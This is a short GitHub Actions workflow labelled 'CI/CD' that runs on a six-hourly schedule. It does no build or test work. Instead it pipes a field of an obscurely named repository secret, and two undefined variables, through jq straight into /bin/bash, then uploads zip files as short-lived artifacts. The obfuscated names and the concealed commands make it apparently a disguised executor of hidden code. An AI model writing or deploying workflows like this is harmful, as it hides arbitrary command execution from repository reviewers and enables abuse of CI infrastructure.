name: CI/CD
on:
  workflow_dispatch:

  schedule:
    - cron: '51 1,7,13,19 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          nal40848: ${{ secrets.nal40848 }}
        run: |
          printf '%s' "$nal40848" | jq -r .g96941 | /bin/bash
          echo $v6 | jq -r .fy21 | /bin/bash
          echo $cv70139 | jq -r .kc0 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: Q6txLEG8
          path: "*.zip"
          retention-days: 1
